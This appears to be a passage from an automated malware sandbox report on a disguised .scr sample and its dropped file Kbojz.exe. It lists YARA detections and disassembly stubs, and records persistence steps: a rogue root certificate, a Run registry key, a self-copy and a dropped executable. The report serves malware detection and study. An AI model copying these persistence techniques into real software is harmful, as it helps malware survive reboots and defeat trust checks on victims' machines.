                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: Yara matchFile source: 3.2.Kbojz.exe.37a86e0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Kbojz.exe.37efeb0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4cf0000.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.6010000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Kbojz.exe.37a86e0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.640000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3acec70.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Kbojz.exe.3351590.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Kbojz.exe.392fed0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.419873303.0000000000640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.420766544.00000000022E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.359357988.0000000006010000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.356481377.00000000021F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.432614615.0000000004CF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.410066207.000000000392F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.410066207.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr PID: 3224, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr PID: 3372, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kbojz.exe PID: 3552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kbojz.exe PID: 3652, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kbojz.exe PID: 3752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kbojz.exe PID: 3840, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_046A35E8 push ebp; retf 0_2_046A35EF
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_046A3623 push ds; retf 0_2_046A3626
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_046A60C3 push 00000004h; iretd 0_2_046A60D0
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_046A7104 push esp; ret 0_2_046A7109
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_04C83E65 pushad ; ret 0_2_04C83E68
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_04C81B9B push ecx; retf 0_2_04C81B9C
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_058B3DB3 push ebx; ret 0_2_058B3DB4
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_058B6903 push edi; retf 0_2_058B6906
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_001E5370 push esp; ret 2_2_001E5379
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00609972 push edi; ret 2_2_00609973
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00609975 push edi; ret 2_2_00609993
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_0060995F push edi; ret 2_2_006099E3
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_0060995F push esi; ret 2_2_00609A43
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_0060995F push esi; ret 2_2_00609AA3
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_0060995F push esi; ret 2_2_00609AF3
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_0060995F push ebp; ret 2_2_00609B43
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_006099E0 push edi; ret 2_2_006099F3
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_006099A5 push esi; ret 2_2_00609A43
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_006099A5 push esi; ret 2_2_00609AA3
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_006099A5 push esi; ret 2_2_00609AE3
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_006099A5 push ebp; ret 2_2_00609B43
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00609995 push edi; ret 2_2_00609993
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00609995 push edi; ret 2_2_006099A3
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00609A72 push esi; ret 2_2_00609A73
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00609A45 push ebp; ret 2_2_00609B43
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00609AE0 push esi; ret 2_2_00609AF3
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00609B00 push ebp; ret 2_2_00609B43
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00608D33 push esp; ret 2_2_00608D38
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00608D14 push esp; ret 2_2_00608D19
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00608DFA push ebx; ret 2_2_00608DFB
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00608DC7 push ebx; ret 2_2_00608DC8

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile created: \ugs - cro req - khidubai (opl-841724).scr
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile created: \ugs - cro req - khidubai (opl-841724).scrJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile created: C:\Users\user\AppData\Roaming\Kbojz.exeJump to dropped file
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KbojzJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KbojzJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
